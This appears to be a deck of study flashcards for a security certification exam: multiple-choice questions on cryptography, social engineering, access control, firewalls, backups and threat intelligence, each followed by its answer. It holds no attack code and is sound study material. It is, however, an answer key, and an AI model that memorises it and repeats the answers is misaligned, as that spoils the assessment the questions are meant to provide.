YOU'VE RECEIVED AN ASSORTMENT OF FILES ALONG W/ACCOMPANYING HASHES TO GUARANTEE INTEGRITY. SOME OF THE HASH VALUES ARE 256-BIT AND SOME ARE 512-BIT. ASSUMING THEY ALL USE THE SAME BASIC ALGORITHM, WHAT MIGHT IT BE? (CRYPTOGRAPHY) MD5 SHA2 SHA1 RIPEMD

SHA2

WHAT IS A RISK CALLED WHEN USING ANY DISPLAY WHERE SOMEONE CAN SEE IT? DENIAL OF SERVICE ATTACK WIRELESS ATTACK MITM ATTACK SHOULDER SURFING

SHOULDER SURFING

YOU HAVE NOTICED THAT SOMEONE READ YOUR PASSWORD FROM THE ROOM BEYOND YOU AS YOU LOG IN. WHAT TYPE OF TECHNIQUE IS USED? PIGGYBACKING DUMPSTER DIVING SHOULDER SURFING SMURFING

SHOULDER SURFING

________ IS A CONTACT-BASED SMART CARD STORING THE INTERNATIONAL MOBILE SUBSCRIBER IDENTITY (IMSI) NUMBER AND KEY ASSOCIATED WITH A MOBILE NETWORK USER. CAC PIV OTP SIM

SIM (SUBSCRIBER IDENTITY MODULE)

WHICH OF THE FOLLOWING IS A TYPE OF BACKUP THAT IS USED TO QUICKLY CAPTURE THE STATE OF A SYSTEM AT A GIVEN POINT WITH A LIMITED IMPACT ON ONGOING OPS? DIFFERENTIAL FULL INCREMENTAL SNAPSHOT

SNAPSHOT

VIRTUAL PLATFORMS: SNAPSHOTS | SANDBOXING | SECURITY CONTROL TESTING | PATCH COMPATIBILITY | HOST AVAILABILITY/ELASTICITY

SNAPSHOTS: EASY TO CREATE A SNAPSHOT OF A VM
SANDBOXING: SINCE A VM CAN ONLY ACCESS HOST RESOURCES THRU THE HYPERVISOR AND DOESN'T INTERACT DIRECTLY W/OTHER VMS, IT'S EFFECTIVELY A SANDBOX ENVIRONMENT ISOLATED FROM THE REST OF THE HOST
SECURITY CONTROL TESTING: VIRTUAL TEST ENVIRONMENTS ARE AN IDEAL PLACE TO THOROUGHLY TEST SECURITY CONTROLS BEFORE DEPLOYING THEM ON THE REAL NETWORK
PATCH COMPATIBILITY: A TEST VM IS ALSO USEFUL FOR TESTING OS/APPLICATION PATCHES TO MAKE SURE THEY DON'T INTRODUCE ANY PROBLEMS
HOST AVAILABILITY/ELASTICITY: IT'S REASONABLY EASY TO MAINTAIN HIGH AVAILABILITY FOR SERVICES HOSTED ON A VM - AFTER ALL, IT'S EASY TO TRANSFER THE VM IF THE PHYSICAL HOST HAS PROBLEMS OR NEEDS MAINTENANCE

WHICH OF THE FOLLOWING IS A SPECIAL FORM OF ATTACK IN WHICH HACKERS EXPLOIT HUMAN PSYCHOLOGY? CROSS SITE SCRIPTING SOCIAL ENGINEERING REVERSE ENGINEERING INSECURE NETWORK

SOCIAL ENGINEERING

WHICH OF THE FOLLOWING IS TARGETED BY NATURE, WITH EMAILS DESIGNED EXCLUSIVELY FOR ONE SPECIFIC USER? SMISHING VISHING SPEAR PHISHING ALGO-BASED PHISHING

SPEAR PHISHING

WHICH OF THE FOLLOWING IS USED FOR SECURE REMOTE ACCESS BUT CAN ALSO CREATE PROXY CONNECTIONS TO OBSCURE YOUR NETWORK LOCATION? (RISK MGMT) CURL HPING SSH PATHPING

SSH

WHAT ALLOWS USERS TO ACCESS MANY SERVICES WITH 1 SET OF CREDS? PRINCIPLE OF LEAST PRIVILEGE FEDERATED ID MGMT REMOTE ATTESTATION SSO

SSO (SINGLE SIGN ON)

IN WHICH OF THE FOLLOWING DOES THE SERVER PERIODICALLY VERIFY ITS OWN CERTIFICATE STATUS & RECEIVE A TIME-STAMPED RESPONSE SIGNED BY THE CA? (CRYPTOGRAPHY) KEY PINNING TRANSPOSITION STAPLING ESCROW

STAPLING

Which DMZ topology is displayed in the figure? [Figure: Wkstn -- Trusted LAN -- FIREWALL -- WAN] Bastion Host UTM Firewall Single Firewall Dual Firewall

Single Firewall

TACACS+ (Terminal Access Controller Access Control System Plus) ADVANTAGES OVER RADIUS (Remote Authentication Dial-In User Service)

TACACS+: TCP PORT 49 | ENCRYPTS ENTIRE ACCESS REQUEST PACKETS | ENTIRELY SEPARATES ALL 3 STEPS OF THE AAA PROCESS | SUPPORTS MORE NON-IP PROTOCOLS
RADIUS: UDP (CONNECTION-LESS) | COMBINES AUTHENTICATION & AUTHORIZATION INTO A SINGLE STEP

YOU WANT TO SEND THREAT INFO VIA A STD PROTOCOL SPECIFICALLY DESIGNED TO EXCHANGE CYBER THREAT INFO. WHAT SHOULD YOU CHOOSE? (RISK MGMT) OPENIC STIX 2.0 STIX 1.0 TAXII

TAXII (TRUSTED AUTOMATED EXCHANGE OF INDICATOR INFO)

JOE IS TUNING HIS ORGANIZATION'S FIREWALL RULES TO PREVENT IP SPOOFING. WHAT TYPE OF CONTROL IS JOE IMPLEMENTING? (SECURITY FUNDAMENTALS) Technical Physical Managerial Operational

TECHNICAL | TECHNICAL CONTROLS ENFORCE CONFIDENTIALITY, INTEGRITY, & AVAILABILITY IN DIGITAL SPACE

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING SOCIAL ENGINEERING ATTACKS? - THESE ATTACKS ARE MOST COMMONLY EITHER IN PERSON OR OVER ELECTRONIC MEDIA RATHER THAN ON THE PHONE - IT DOESN'T TAKE ADVANTAGE OF INSECURE BEHAVIORS IN THE REAL WORLD - IT DOESN'T TAKE ANY ADVANTAGE OF HUMAN BEHAVIORS TO STEAL INFO DIRECTLY - THE MOST COMMON FACTOR IN SOCIAL ENGINEERING ATTACKS IS IMPERSONATION

THE MOST COMMON FACTOR IN SOCIAL ENGINEERING ATTACKS IS IMPERSONATION

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING PRIVILEGED USERS? - THEY NEED TO BE AWARE OF THE EXTRA PERMISSIONS THEY'VE BEEN GIVEN, WHAT RESPONSIBILITIES COME WITH THEM, AND THE IMPORTANCE OF NOT SHARING THEIR CREDS WITH OTHER USERS - THEY NEED TO BE REGULARLY KEPT ABREAST OF NETWORK CHANGES AND EVOLVING THREATS AND TO HAVE DETAILED SYSTEM DOCUMENTATION AVAILABLE AT ALL TIMES - THEY NEED TO BE AWARE OF THE IMPORTANCE OF SHARING THEIR CREDS WITH OTHER USERS - THEY NEED ADDITIONAL FOCUS ON RECOGNIZING SOCIAL ENGINEERING ATTACKS AND PROTECTING THE ORG'S REPUTATION

THEY NEED TO BE AWARE OF THE EXTRA PERMISSIONS THEY'VE BEEN GIVEN, WHAT RESPONSIBILITIES COME WITH THEM, AND THE IMPORTANCE OF NOT SHARING THEIR CREDS WITH OTHER USERS

YOUR ORG WANTS YOU TO VISUALLY DISPLAY INFO ABOUT THE LOCATION OF THREAT ACTORS. WHICH OF THE FOLLOWING THREAT RESEARCH TOOLS WILL YOU USE? (RISK MGMT) STIX VULNERABILITY FEED PREDICTIVE ANALYTICS THREAT MAP

THREAT MAP

WHY ARE FARADAY CAGES DEPLOYED? TO PREVENT TAILGATING TO PREVENT EMI TO ASSIST W/FIRE SUPPRESSION TO PREVENT DEGAUSSING

TO PREVENT EMI

WHY WOULD YOU CONFIGURE A PASSWORD HISTORY THAT TRACKS PREVIOUS PASSWORDS? TO PREVENT ATTACKERS FROM EASILY CRACKING PASSWORDS TO PREVENT PASSWORD REUSE TO KEEP USERS FROM CHOOSING SIMPLE PASSWORDS TO MAKE SURE USERS CHANGE THEIR PASSWORDS REGULARLY

TO PREVENT PASSWORD REUSE

WHICH OF THE FOLLOWING COMMANDS WILL DISPLAY THE LAST 30 LINES OF A FILE NAMED logfile2.txt? head -n 30 logfile2.txt tail -n 30 logfile2.txt grep -n 30 logfile2.txt cat -n 30 logfile2.txt

tail -n 30 logfile2.txt

WHAT DO FAIL-SAFE/FAIL-OPEN LOCKS MEAN? GOOD FOR SAFETY AND SECURITY BAD FOR SAFETY AND SECURITY UNLOCKS WHEN POWER IS CUT LOCKS WHEN POWER IS CUT

UNLOCKS WHEN POWER IS CUT

MARK WANTS TO SECURELY ERASE THE CONTENTS OF A TAPE USED FOR BACKUPS IN HIS ORG'S TAPE LIBRARY. WHICH IS THE FASTEST SECURE ERASE METHOD HE CAN USE THAT WILL STILL ALLOW THE TAPE TO BE REUSED? BURN THE TAPE INCINERATE THE TAPE WIPE THE TAPE BY WRITING A RANDOM PATTERN OF 1S AND 0S TO IT USE A DEGAUSSER

USE A DEGAUSSER

YOUR INTERNAL NETWORK IS PROTECTED FROM INTERNET ATTACKS BY A CISCO FIREWALL. TO IMPROVE SECURITY, YOUR SUPERVISOR SUGGESTS INSTALLING A FORTINET FIREWALL BETWEEN THE CISCO FIREWALL & THE TRUSTED LAN, THEN USING THE SPACE BETWEEN AS A PERIMETER NETWORK. WHICH SECURITY PRINCIPLES DOES THIS PROMOTE? (SECURITY FUNDAMENTALS) Security by obscurity Vendor diversity Availability Defense in depth Security by design

VENDOR DIVERSITY & DEFENSE IN DEPTH

AS PART OF MONTHLY INCIDENT RESPONSE PREPARATIONS, YOUR ORG GOES THROUGH A SAMPLE INCIDENT STEP BY STEP TO VALIDATE WHAT EACH PERSON WILL DO IN THE INCIDENT. WHAT TYPE OF EXERCISE IS THIS? ISCP CHECKLIST TEST WALKTHROUGH SIMULATION TEST

WALKTHROUGH

WHICH OF THE FOLLOWING SYSLOG SEVERITY LEVELS IS AN ERROR OR A PROBLEM CONDITION THAT IS IMMEDIATELY HARMLESS OR CORRECTABLE BUT MIGHT NEED USER REVIEW? WARNING ERROR NOTICE INFORMATIONAL

WARNING

WHAT IS THE FIRST VERSION OF WINDOWS TO INCLUDE REAL-TIME ANTIVIRUS SCANNING? WINDOWS 7 WINDOWS VISTA WINDOWS XP SERVICE PACK 2 WINDOWS 8

WINDOWS 8

WHAT KIND OF MALWARE REPLICATES ITSELF BY EXPLOITING SYSTEM VULNERABILITIES? TROJAN HORSE VIRUS WORM LOGIC BOMB

WORM

A SECURITY ANALYST IS REVIEWING A NEW WEBSITE THAT WILL SOON BE MADE PUBLICLY AVAILABLE. THE ANALYST SEES THE FOLLOWING IN THE URL: http://dev-site.UCertify.com/home/show.php?sessionID=7772554&loc=uk THE ANALYST THEN SENDS AN INTERNAL USER A LINK TO THE NEW WEBSITE FOR TESTING PURPOSES, AND WHEN THE USER CLICKS THE LINK, THE ANALYST IS ABLE TO BROWSE THE WEBSITE WITH THE FOLLOWING URL: http://dev-site.UCertify.com/home/show.php?sessionID=9899475&loc=uk WHICH OF THE FOLLOWING APPLICATION ATTACKS IS BEING TESTED? SQL INJECTION XSS XSRF BUFFER OVERFLOW

XSRF (CROSS-SITE REQUEST FORGERY)

WHICH OF THE FOLLOWING IS A PROPRIETARY WIRELESS STD MAINTAINED BY SILICON LABS THAT SUPPORTS THROUGHPUT UP TO 40 KBPS OVER DISTANCES OF 10-100M BETWEEN NODES? ZWAVE ZIGBEE CAN BUS NB-IoT

Z-WAVE

WHICH OF THE FOLLOWING ALLOWS YOU TO REDIRECT WORKFLOWS THROUGH SAAS OFFERINGS FROM DIFFERENT PROVIDERS, OR TO FEED ON-PREMISES DATA COLLECTION INTO A CLOUD ANALYTICS PLATFORM? AaaS MaaS iPaaS FWaaS

iPaaS
